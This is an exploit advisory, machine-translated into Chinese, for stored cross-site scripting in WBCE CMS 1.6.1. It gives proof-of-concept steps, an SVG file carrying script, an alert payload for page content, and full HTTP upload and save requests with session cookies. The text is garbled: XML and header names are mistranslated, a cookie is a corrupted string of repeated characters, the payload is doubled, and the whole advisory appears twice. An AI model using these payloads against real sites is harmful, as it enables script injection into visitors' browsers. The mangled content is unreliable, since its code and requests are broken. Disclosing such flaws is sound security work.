利用标题: WBCE CMS 1.6.1-多个存储的跨站点脚本(XSS)
版本: 1.6.1
BUGS: XSS
Technology: php
供应商URL: https://wbce-cms.org/
软件link: https://github.com/wbce/wbce_cms/releases/tag/1.6.1
发现日期: 03-05-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
### XSS-1 ###
步骤:
1。转到媒体(http://localhost/wbce_cms-1.6.1/wbce/admin/媒体/)
2。上传恶意SVG文件
SVG文件内容===
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
POC请求:
post/wbce_cms-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php http/1.1
HOST: LOCALHOST
内容长度: 976
sec-ch-ua:'不是?a_brand'; v='8','chromium'; v='108'
sec-ch-ua-platform:'linux'
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/108.0.5359.125 Safari/537.36
content-type:多部分/form-data;边界=--- WebKitFormBoundary5U4R3Pogl4Nubto
ACCEPT: /
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/媒体/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: Stelem ___ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; wbcelastConnectjs=1683060167
连接:关闭
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data;名称='reqid'
187DE34EA92AC
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data;名称='cmd'
上传
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data;名称='目标'
l1_lw
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data; name='upload []'; filename='svg_xss.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data; name='mtime []'
1683056102
------ WebKitFormBoundary5U4R3Pogl4Nubto--
3。转到SVG文件(http://localhost/wbce_cms-1.6.1/wbce/媒体/svg_xss.svg)
================================================================================================================================================================================================================
### XSS-2 ###
1。转到页面(http://localhost/wbce_cms-1.6.1/wbce/admin/pempages)
2。添加页面
3。写页源内容脚本Talert(4)/脚本(%3CScript%3ealert%284%29%3C%2FScript%3E)
PAYLOAD:%3CScript%3EALERT%284%29%3C%2fscript%3E
POC请求:
post/wbce_cms-1.6.1/wbce/modules/wysiwyg/save.php http/1.1
HOST: LOCALHOST
内容长度: 143
cache-control: max-age=0
sec-ch-ua:'不是?a_brand'; v='8','chromium'; v='108'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/108.0.5359.125 Safari/537.36
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.9
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/pages/pages/modify.php?page_id=4
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: Stelem ___ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; wbcelastConnectjs=1683060475
连接:关闭
page_id=4Section_id=4formToken=6071E516-6EA84938EA2E60B811895C9072C4416666AE07FCONTENT4=%3CScript%3CScript%3EALERT%3EALERT%284%284%29%29%3C%3C%2fscript%3Emodify=Save=保存
4。查看页http://localhost/wbce_cms-1.6.1/wbce/pages/hello.php
版本: 1.6.1
BUGS: XSS
Technology: php
供应商URL: https://wbce-cms.org/
软件link: https://github.com/wbce/wbce_cms/releases/tag/1.6.1
发现日期: 03-05-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
### XSS-1 ###
步骤:
1。转到媒体(http://localhost/wbce_cms-1.6.1/wbce/admin/媒体/)
2。上传恶意SVG文件
SVG文件内容===
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
POC请求:
post/wbce_cms-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php http/1.1
HOST: LOCALHOST
内容长度: 976
sec-ch-ua:'不是?a_brand'; v='8','chromium'; v='108'
sec-ch-ua-platform:'linux'
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/108.0.5359.125 Safari/537.36
content-type:多部分/form-data;边界=--- WebKitFormBoundary5U4R3Pogl4Nubto
ACCEPT: /
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/媒体/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: Stelem ___ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; wbcelastConnectjs=1683060167
连接:关闭
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data;名称='reqid'
187DE34EA92AC
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data;名称='cmd'
上传
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data;名称='目标'
l1_lw
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data; name='upload []'; filename='svg_xss.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
------ webkitformboundary5U4R3Pogl4Nubto
content-disposition: form-data; name='mtime []'
1683056102
------ WebKitFormBoundary5U4R3Pogl4Nubto--
3。转到SVG文件(http://localhost/wbce_cms-1.6.1/wbce/媒体/svg_xss.svg)
================================================================================================================================================================================================================
### XSS-2 ###
1。转到页面(http://localhost/wbce_cms-1.6.1/wbce/admin/pempages)
2。添加页面
3。写页源内容脚本Talert(4)/脚本(%3CScript%3ealert%284%29%3C%2FScript%3E)
PAYLOAD:%3CScript%3EALERT%284%29%3C%2fscript%3E
POC请求:
post/wbce_cms-1.6.1/wbce/modules/wysiwyg/save.php http/1.1
HOST: LOCALHOST
内容长度: 143
cache-control: max-age=0
sec-ch-ua:'不是?a_brand'; v='8','chromium'; v='108'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/108.0.5359.125 Safari/537.36
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.9
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/pages/pages/modify.php?page_id=4
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: Stelem ___ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; wbcelastConnectjs=1683060475
连接:关闭
page_id=4Section_id=4formToken=6071E516-6EA84938EA2E60B811895C9072C4416666AE07FCONTENT4=%3CScript%3CScript%3EALERT%3EALERT%284%284%29%29%3C%3C%2fscript%3Emodify=Save=保存
4。查看页http://localhost/wbce_cms-1.6.1/wbce/pages/hello.php